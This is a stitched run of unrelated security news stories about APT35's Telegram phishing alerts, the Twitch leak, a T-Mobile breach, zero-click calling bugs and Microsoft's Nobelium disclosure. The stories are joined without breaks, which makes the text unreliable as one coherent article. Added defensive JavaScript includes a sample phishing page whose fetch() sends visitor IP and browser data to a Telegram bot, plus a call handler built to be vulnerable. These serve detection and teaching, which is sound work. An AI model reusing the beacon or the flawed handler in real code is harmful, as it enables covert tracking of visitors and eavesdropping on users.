When the Iranian hacking group APT35 wants to know if one of its digital lures has gotten a bite, all it has to do is check Telegram. Whenever someone visits one of the copycat sites they’ve set up, a notification appears in a public channel on the messaging service, detailing the potential victim’s IP address, location, device, browser, and more. It’s not a push notification; it’s a phish notification.
Google’s Threat Analysis Group outlined the novel technique as part of a broader look at APT35, also known as Charming Kitten, a state-sponsored group that has spent the last several years trying to get high-value targets to click on the wrong link and cough up their credentials. And while APT35 isn’t the most successful or sophisticated threat on the international stage—this is the same group, after all, that accidentally leaked hours of videos of themselves hacking—their use of Telegram stands out as an innovative wrinkle that could pay dividends.
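The beacon described above is easy to spot once you have a copy of the phishing page, because Telegram's Bot API is called over plain HTTPS with the bot token in the URL path and the destination chat id passed as a parameter. The following is an added example of a triage script for captured page source; it is not code from Google TAG or from any APT35 kit, and the sample page, bot token and chat id are constructed placeholders in the real formats.

```javascript
// Added example: triage captured phishing-page source for a Telegram Bot API
// beacon. Not code from Google TAG or from any APT35 kit; the sample page,
// bot token and chat id below are constructed placeholders in the real formats.

// Bot API calls carry the token in the URL path: /bot<id>:<secret>/<method>.
const TELEGRAM_BEACON_RE =
  /api\.telegram\.org\/bot(\d{6,12}):([A-Za-z0-9_-]{30,})\/(sendMessage|sendPhoto|sendDocument)/g;
// Destination channel or chat; kits pass it as a query, form or JSON field.
const CHAT_ID_RE = /chat_id["']?\s*[:=]\s*["']?(-?\d{5,16})/;

// Heuristics for which visitor attributes the page gathers before sending.
const VISITOR_FIELD_HINTS = {
  userAgent: /navigator\.userAgent/,
  language: /navigator\.language/,
  platform: /navigator\.platform/,
  screen: /screen\.(width|height)/,
  ipLookup: /(ipinfo\.io|ipapi\.co|ip-api\.com|api\.ipify\.org)/,
};

// Keep the numeric bot id (useful to correlate kits) but mask the secret so
// the report can be shared without handing out a working token.
function redactToken(botId, secret) {
  return `${botId}:${secret.slice(0, 4)}${"*".repeat(secret.length - 4)}`;
}

function findTelegramBeacons(source) {
  const beacons = [];
  for (const m of source.matchAll(TELEGRAM_BEACON_RE)) {
    const [, botId, secret, method] = m;
    // The chat id is normally within a few hundred bytes of the API call.
    const nearby = source.slice(Math.max(0, m.index - 300), m.index + 500);
    const chat = CHAT_ID_RE.exec(nearby);
    beacons.push({
      botId,
      token: redactToken(botId, secret),
      method,
      chatId: chat ? chat[1] : null,
    });
  }
  return beacons;
}

function collectedFields(source) {
  return Object.keys(VISITOR_FIELD_HINTS).filter((k) => VISITOR_FIELD_HINTS[k].test(source));
}

function scanPage(source) {
  const beacons = findTelegramBeacons(source);
  return { beacons, fields: collectedFields(source), suspicious: beacons.length > 0 };
}

// Constructed sample of a credential-phishing page with a visitor beacon.
const SAMPLE_PAGE = `<html><body>
<form id="login"><input name="email"><input name="password" type="password"></form>
<script>
var msg = "ip:" + visitorIp + " ua:" + navigator.userAgent + " lang:" + navigator.language;
fetch("https://api.telegram.org/bot1234567890:AAFxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/sendMessage", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ chat_id: "-1001234567890", text: msg })
});
</script></body></html>`;

function scanSample() {
  return scanPage(SAMPLE_PAGE);
}

console.log(JSON.stringify(scanSample(), null, 2));
```

The bot id survives redaction on purpose: kits get copied and re-sold, and the same bot id showing up across unrelated lures is a useful pivot. The field heuristics are deliberately loose; a kit that gathers the visitor's IP server-side will show nothing for `ipLookup`, so treat an empty field list as "unknown", not "nothing collected".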
The group uses a variety of approaches to try to get people to visit their phishing pages in the first place. Google outlined a few scenarios it has observed lately: the compromise of a UK university website, a fake VPN app that briefly snuck into the Google Play Store, and phishing emails in which the hackers pretend to be organizers of real conferences, and attempt to entrap their marks through malicious PDFs, Dropbox links, websites, and more.
In the case of the university website, the hackers direct potential victims to the compromised page, which encourages them to log in with the service provider of their choice—everything from Gmail to Facebook to AOL is on offer—to view a webinar. If you enter your credentials, they go straight to APT35, which also asks for your two-factor authentication code. It’s a technique so old it’s got whiskers on it; APT35 has been running it since 2017 to target people in government, academia, national security, and more.
The fake VPN isn’t especially innovative, either, and Google says it booted the app from its store before anyone managed to download it. If anyone had fallen for the ruse, though—or does install it on another platform where it’s still available—the spyware can steal call logs, texts, location data, and contacts.
Frankly, APT35 are not exactly overachievers. While they convincingly impersonated officials from the Munich Security conference and Think-20 Italy in recent years, that too is straight out of Phishing 101. “This is a very prolific group that has a wide target set, but that wide target set is not representative of the level of success the actor has,” says Ajax Bash, security engineer at Google TAG. “Their success rate is actually very low.”
This morning, an anonymous hacker released what they claim is an enormous cache of proprietary data from Twitch, the popular streaming platform, including Twitch.tv source code and streamers’ revenue information.
“Jeff Bezos paid $970 million for this, we’re giving it away FOR FREE,” wrote the poster on 4chan. Today’s leak, which its original poster described as “extremely poggers,” is by far the biggest to ever hit Twitch, which was acquired by Amazon in 2014.
The leak, first reported by Video Games Chronicle, reportedly contains 125 GB of data. That data includes the source code for Twitch.tv; Twitch’s mobile, desktop, and game console clients; proprietary SDKs; Twitch-owned properties including Vapor, Amazon’s alleged Steam competitor from Amazon Game Studios; and internal security tools. The leak does not appear to contain streamers’ or users’ personal information, but the damage appears extensive. The post is titled “twitch leaks part one,” implying that there may be more to come.
“Anytime source code gets leaked it’s not good and potentially disastrous,” says Ekram Ahmed, spokesperson at security firm Check Point. “It opens a gigantic door for evildoers to find cracks in the system, lace malware, and potentially steal sensitive information.”
The 4chan poster also referenced Twitch’s recent wave of hate raids, in which botmakers have been spamming marginalized streamers’ chats with bigoted harassment. Mentioning the #DoBetterTwitch hashtag (more commonly #TwitchDoBetter), the poster claimed that Twitch is a “disgusting cesspool.” They wrote that the leak, which appears to contain huge amounts of proprietary data, is to “foster more disruption and competition in the online video game streaming space.” Twitch has introduced several new tools to combat these hate raids, and sued two alleged hate raiders last month.
Twitch declined to comment to WIRED but confirmed Wednesday morning that a breach had taken place. “Our teams are working with urgency to understand the extent of this,” the official Twitch account tweeted. “We will update the community as soon as additional information is available.”
“I wish I could say I’m surprised,” says Avery, a streamer who goes by Littlesiha and does not publicly share her last name for privacy reasons. “It took Twitch two months to find a way to protect marginalized creators that were getting harassed, threatened, and doxed through chatbot raids. Security on the site feels like a joke at this point.”
While much of the data appears to be legitimate, there is some debate over the accuracy of streamers’ revenue numbers. Some streamers have tweeted that their payout numbers are accurate, while others have claimed otherwise. “It was wrong, for my number,” said popular Twitch personality Asmongold while streaming Amazon’s new video game New World this morning. “It’s harder to fuck up more than this,” he told WIRED.
Also streaming on Twitch, Nick “NMP” Polom said, “I kind of feel violated right now.” His viewers, numbering in the tens of thousands, took the leak as an opportunity to meme, donating money attached to messages like “Seems like you need this more than me. I work at McDonald’s.” (On Twitter, he wrote that he is “live right now being relentlessly SHIT ON by my community for being ‘poor.’ THANKS @twitch.”) Although many streamers have expressed deep worry over the leak, some are turning it into a joke: Top streamer Chance “Sodapoppin” Morris, who was 42nd in the streamer revenue number list, begged his viewers not to view it as real: “I swear I’m one of the richest ones on the platform,” he joked. “I make WAY more than that.” (For many top streamers, Twitch payouts are just one revenue stream among many.) Streaming on Twitch, Felix “xQc” Lengyel shouted, “I told y’all—it’s trillionaire with a fucking ‘T’!”
Not all data breaches are created equal. None of them are good, but they do come in varying degrees of bad. And given how regularly they happen, it’s understandable that you may have become inured to the news. Still, a T-Mobile breach that hackers claim involved the data of 100 million people deserves your attention, especially if you’re a customer of the “un-carrier.”
As first reported by Motherboard on Sunday, someone on the dark web claims to have obtained the data of 100 million people from T-Mobile’s servers and is selling a portion of it on an underground forum for 6 bitcoin, about $280,000. The trove includes not only names, phone numbers, and physical addresses but also more sensitive data like social security numbers, driver’s license information, and IMEI numbers, unique identifiers tied to each mobile device. Motherboard confirmed that samples of the data “contained accurate information on T-Mobile customers.”
A lot of that information is already widely available, even the social security numbers, which can be found on any number of public records sites. There’s also the reality that most people’s data has been leaked at some point or another. But the apparent T-Mobile breach offers potential buyers a blend of data that could be used to great effect, and not in ways you might automatically assume.
“This is ripe for using the phone numbers and names to send out SMS-based phishing messages that are crafted in a way that’s a little bit more believable,” says Crane Hassold, director of threat intelligence at email security company Abnormal Security. “That’s the first thing that I thought of, looking at this.”
Yes, names and phone numbers are relatively easy to find. But a database that ties those two together, along with identifying someone’s carrier and fixed address, makes it much easier to convince someone to click on a link that advertises, say, a special offer or upgrade for T-Mobile customers. And to do so en masse.
The same is true for identity theft. Again, a lot of the T-Mobile data is out there already in various forms across various breaches. But having it centralized streamlines the process for criminals—or for someone with a grudge, or a specific high-value victim in mind, says Abigail Showman, team lead at risk intelligence firm Flashpoint.
And while names and addresses may be fairly common grist at this point, International Mobile Equipment Identity numbers are not. An IMEI identifies a specific handset rather than a person, but paired in the same record with the customer’s name, number, and address, it is one more detail an attacker can recite to pass as that customer with carrier support in a so-called SIM-swap attack. “This could lead to account takeover concerns,” Showman says, “since threat actors could gain access to two-factor authentication or one-time passwords tied to other accounts—such as email, banking, or any other account employing advanced authentication security feature—using a victim’s phone number.”
That’s not a hypothetical concern; SIM-swap attacks have run rampant over the past several years, and a previous breach, which T-Mobile disclosed in February, was used specifically to execute them.
T-Mobile confirmed on Monday that a breach had occurred but not whether customer data had been compromised. “We have been working around the clock to investigate claims being made that T-Mobile data may have been illegally accessed,” the company said in an emailed statement. “We have determined that unauthorized access to some T-Mobile data occurred, however we have not yet determined that there is any personal customer data involved. We are confident that the entry point used to gain access has been closed, and we are continuing our deep technical review of the situation across our systems to identify the nature of any data that was illegally accessed.”
In early 2019, a bug in group FaceTime calls would have let attackers activate the microphone, and even the camera, of the iPhone they were calling and eavesdrop before the recipient did anything at all. The implications were so severe that Apple invoked a nuclear option, cutting off access to the group-calling feature entirely until the company could issue a fix. The vulnerability—and the fact that it required no taps or clicks at all on the part of the victim—captivated Natalie Silvanovich.
“The idea that you could find a bug where the impact is, you can cause a call to be answered without any interaction—that’s surprising,” says Silvanovich, a researcher in Google’s Project Zero bug-hunting team. “I went on a bit of a tear and tried to find these vulnerabilities in other applications. And I ended up finding quite a few.”
Silvanovich has spent years studying “interaction-less” vulnerabilities, hacks that don’t require their targets to click a malicious link, download an attachment, enter a password in the wrong place, or participate in any way. Those attacks have taken on increasing significance as targeted mobile surveillance explodes around the world.
At the Black Hat security conference in Las Vegas on Thursday, Silvanovich is presenting her findings about remote eavesdropping bugs in ubiquitous communication apps like Signal, Google Duo, and Facebook Messenger, as well as popular international platforms JioChat and Viettel Mocha. All of the bugs have been patched, and Silvanovich says that the developers were extremely responsive about fixing the vulnerabilities within days or a few weeks of her disclosures. But the sheer number of discoveries in mainstream services underscores how common these flaws can be and the need for developers to take them seriously.
“When I heard about that group FaceTime bug I thought it was a unique bug that would never occur again, but that turned out not to be true,” says Silvanovich. “This is something we didn’t know about before, but it’s important now for the people who make communication apps to be aware. You’re making a promise to your users that you’re not going to suddenly start transmitting audio or video of them at any time, and it’s your burden to make sure that your application lives up to that.”
The vulnerabilities Silvanovich found offered an assortment of eavesdropping options. The Facebook Messenger bug could have allowed an attacker to listen in on audio from a target’s device. The Viettel Mocha and JioChat bugs both potentially gave advanced access to audio and video. The Signal flaw exposed audio only. And the Google Duo vulnerability gave video access, but only for a few seconds. During this time an attacker could still record a few frames or grab screenshots.
The apps Silvanovich looked at all build much of their audio and video calling infrastructure on real-time communication tools from the open source project WebRTC. Some of the interaction-less calling vulnerabilities stemmed from developers who seemingly misunderstood WebRTC features, or implemented them poorly. But Silvanovich says that other flaws came from design decisions specific to each service related to when and how it sets up calls.
When someone calls you on an internet-based communication app, the system can start setting up the connection between your devices right away, a process known as “establishment,” so the call can start instantly when you hit accept. Another option is for the app to hang back a bit, wait to see if you accept the call, and then take a couple of seconds to establish the communication channel once it knows your preference.
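The design point in the two paragraphs above is that early establishment is fine, but nothing captured from the local microphone or camera may leave the device until the local user accepts, and no message from the caller may be what flips that switch. The following is an added example, not code from Signal, Duo, Messenger, JioChat or Mocha and not a description of any specific bug Silvanovich found: a minimal model of a callee's signaling state machine with that invariant, plus a variant that lets a caller's "connect" message enable outbound media, so the difference can be replayed. The message names ("offer", "connect", "hangup") are assumptions for the model.

```javascript
// Added example: a model of a callee's call-setup state machine. Not code
// from any of the apps named above; message names are assumptions.

class CalleeSession {
  // trustRemoteConnect = true reproduces the class of mistake where a
  // message from the caller, rather than the local user's accept, is what
  // turns on outbound media.
  constructor({ trustRemoteConnect = false } = {}) {
    this.trustRemoteConnect = trustRemoteConnect;
    this.state = "idle";            // idle | ringing | inCall
    this.transportReady = false;    // early "establishment" (ICE/DTLS) is fine
    this.localMediaEnabled = false; // must not become true before accept()
    this.log = [];
  }

  record(event, ok) {
    this.log.push(`${event}:${ok ? "ok" : "rejected"}`);
    return ok;
  }

  // Messages from the remote peer via the signaling channel.
  onRemote(msg) {
    switch (msg.type) {
      case "offer":
        if (this.state !== "idle") return this.record("offer", false);
        this.state = "ringing";
        // Establish early so the call starts instantly on accept. In WebRTC
        // terms: addTransceiver("audio", { direction: "recvonly" }) now, not
        // addTrack(microphoneTrack).
        this.transportReady = true;
        return this.record("offer", true);
      case "connect":
        // A caller's "connect" must never be the thing that starts sending.
        if (this.trustRemoteConnect && this.transportReady) {
          this.state = "inCall";
          this.localMediaEnabled = true; // interaction-less eavesdropping
          return this.record("connect", true);
        }
        return this.record("connect", false);
      case "hangup":
        this.reset();
        return this.record("hangup", true);
      default:
        return this.record(String(msg.type), false);
    }
  }

  // Only the local user's accept flips the transceiver to "sendrecv" and
  // attaches the live microphone/camera track.
  accept() {
    if (this.state !== "ringing") return this.record("accept", false);
    this.state = "inCall";
    this.localMediaEnabled = true;
    return this.record("accept", true);
  }

  reset() {
    this.state = "idle";
    this.transportReady = false;
    this.localMediaEnabled = false;
  }
}

// Replay a signaling script and report whether outbound media was ever
// enabled before the local user accepted.
function leaksBeforeAccept(session, script) {
  let accepted = false;
  for (const step of script) {
    if (step.type === "accept") {
      accepted = true;
      session.accept();
      continue;
    }
    session.onRemote(step);
    if (session.localMediaEnabled && !accepted) return true;
  }
  return false;
}

// Constructed scripts: a caller who sends "connect" without waiting for an
// answer, and a normal call.
const ATTACK_SCRIPT = [{ type: "offer" }, { type: "connect" }];
const NORMAL_SCRIPT = [{ type: "offer" }, { type: "accept" }];

function demo() {
  return {
    vulnerableLeaks: leaksBeforeAccept(new CalleeSession({ trustRemoteConnect: true }), ATTACK_SCRIPT),
    hardenedLeaks: leaksBeforeAccept(new CalleeSession(), ATTACK_SCRIPT),
    hardenedNormalLeaks: leaksBeforeAccept(new CalleeSession(), NORMAL_SCRIPT),
  };
}

console.log(demo());
```

The useful habit here is the `leaksBeforeAccept` check itself: treat "local media enabled while not yet accepted" as an invariant and fuzz the signaling handler with out-of-order and unsolicited messages. A handler that only ever enables sending from the accept path passes regardless of what the peer sends.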
The nation-state hackers who orchestrated the SolarWinds supply chain attack compromised a Microsoft worker’s computer and used the access to launch targeted attacks against company customers, Microsoft said in a terse statement published late on a Friday afternoon.
The hacking group also compromised three entities using password-spraying and brute-force techniques. Brute-forcing bombards a login server with many password guesses for a single account; password spraying tries a few common passwords against many accounts, staying under each account’s lockout threshold. With the exception of the three undisclosed entities, Microsoft said, the password-spraying campaign was “mostly unsuccessful.” Microsoft has since notified all targets, whether attacks were successful or not.
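Because a spray deliberately stays below per-account lockout thresholds, per-account failure counters miss it; it only becomes visible when failures are aggregated by source. The following is an added example of that aggregation over authentication logs, not Microsoft's detection logic, which the page does not describe. The log format and every line in it are constructed for the example.

```javascript
// Added example: distinguish password spraying from single-account brute
// force in authentication logs, aggregated per source address. The log
// format and all lines below are constructed; nothing here is Microsoft's.

const LINE_RE = /^(\S+) src=(\S+) user=(\S+) result=(fail|success)$/;

function parseLine(line) {
  const m = LINE_RE.exec(line.trim());
  if (!m) return null;
  return { ts: m[1], src: m[2], user: m[3], ok: m[4] === "success" };
}

// Per-source aggregation: failures per account tried, and accounts that
// eventually logged in from that source.
function summarizeBySource(lines) {
  const bySrc = new Map();
  for (const line of lines) {
    const ev = parseLine(line);
    if (!ev) continue;
    let s = bySrc.get(ev.src);
    if (!s) {
      s = { src: ev.src, failsPerUser: new Map(), successes: new Set(), total: 0 };
      bySrc.set(ev.src, s);
    }
    s.total += 1;
    if (ev.ok) {
      s.successes.add(ev.user);
    } else {
      s.failsPerUser.set(ev.user, (s.failsPerUser.get(ev.user) || 0) + 1);
    }
  }
  return bySrc;
}

// A spray is many accounts with few failures each; a brute force is many
// failures against one account.
function detect(lines, { sprayMinUsers = 8, sprayMaxFailsPerUser = 3, bruteMinFails = 5 } = {}) {
  const alerts = [];
  for (const s of summarizeBySource(lines).values()) {
    const fails = [...s.failsPerUser.values()];
    const distinctUsers = s.failsPerUser.size;
    const maxFails = fails.length ? Math.max(...fails) : 0;
    const totalFails = fails.reduce((a, b) => a + b, 0);
    let kind = null;
    if (distinctUsers >= sprayMinUsers && maxFails <= sprayMaxFailsPerUser) kind = "password-spray";
    else if (maxFails >= bruteMinFails) kind = "brute-force";
    if (kind) {
      alerts.push({
        src: s.src,
        kind,
        distinctUsers,
        totalFails,
        // Accounts that logged in from a spraying source are the ones to
        // treat as compromised, not merely targeted.
        compromised: [...s.successes].sort(),
      });
    }
  }
  return alerts;
}

// Constructed log: one spraying source (one guess per account, one hit),
// one brute-forcing source, one ordinary login.
const USERS = ["alice", "bob", "carol", "dave", "erin", "frank", "grace", "heidi", "ivan", "judy", "mallory", "oscar"];
const SAMPLE_LOG = [
  ...USERS.map((u, i) => `2021-06-25T10:${String(i).padStart(2, "0")}:00Z src=203.0.113.7 user=${u} result=fail`),
  "2021-06-25T10:12:00Z src=203.0.113.7 user=dave result=success",
  ...Array.from({ length: 8 }, (_, i) => `2021-06-25T11:00:${String(i).padStart(2, "0")}Z src=198.51.100.9 user=bob result=fail`),
  "2021-06-25T12:00:00Z src=192.0.2.5 user=alice result=success",
];

function detectSample() {
  return detect(SAMPLE_LOG);
}

console.log(JSON.stringify(detectSample(), null, 2));
```

Grouping by source address is the simplest form and is enough for the example; a spray distributed across many addresses needs the same aggregation keyed on something the attacker reuses (user agent string, ASN, or the tenant as a whole over a time window). The `compromised` list is the part worth acting on first: an account that succeeded from a spraying source is the one to reset and review.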
The discoveries came in Microsoft’s continued investigation into Nobelium, Microsoft’s name for the sophisticated hacking group that used SolarWinds software updates and other means to compromise networks belonging to nine US agencies and 100 private companies. The US government has attributed Nobelium to Russia’s Foreign Intelligence Service, the SVR.
“As part of our investigation into this ongoing activity, we also detected information-stealing malware on a machine belonging to one of our customer support agents with access to basic account information for a small number of our customers,” Microsoft said in a post. “The actor used this information in some cases to launch highly targeted attacks as part of their broader campaign.”
According to Reuters, Microsoft published the breach disclosure after one of the news outlet’s reporters asked the company about the notification it sent to targeted or hacked customers. Microsoft didn’t reveal the infection of the worker’s computer until the fourth paragraph of the five-paragraph post.
The infected agent, Reuters said, could access billing contact information and the services the customers paid for, among other things. “Microsoft warned affected customers to be careful about communications to their billing contacts and consider changing those usernames and email addresses, as well as barring old usernames from logging in,” the news service reported.
The supply chain attack on SolarWinds came to light in December. After hacking the Austin, Texas-based company and taking control of its software-build system, Nobelium pushed malicious updates to about 18,000 SolarWinds customers.
“The latest cyberattack reported by Microsoft does not involve our company or our customers in any way,” a SolarWinds representative said in an email.
The SolarWinds supply chain attack wasn’t the only way Nobelium compromised its targets. Anti-malware provider Malwarebytes has said it was also infected by Nobelium but through a different vector, which the company didn’t identify.
Both Microsoft and email management provider Mimecast have also said that they, too, were hacked by Nobelium, which then went on to use the compromises to hack the companies’ customers or partners.
Microsoft said that the password-spraying activity targeted specific customers, with 57 percent of them IT companies, 20 percent government organizations, and the rest nongovernmental organizations, think tanks, and financial services. About 45 percent of the activity focused on US interests, 10 percent targeted UK customers, and smaller numbers were in Germany and Canada. In all, customers in 36 countries were targeted.
Reuters, citing a Microsoft spokesman, said that the breach disclosed Friday wasn’t part of Nobelium’s previous successful attack on Microsoft. The company has yet to provide key details, including how long the agent’s computer was compromised and whether the compromise hit a Microsoft-managed machine on a Microsoft network or a contractor device on a home network.
Friday’s disclosure came as a shock to many security analysts.
“I mean, Jesus, if Microsoft can’t keep their own kit clear of viruses, how is the rest of the corporate world supposed to?” Kenn White, an independent security researcher, told me. “You would have thought that customer-facing systems would be some of the most hardened around.”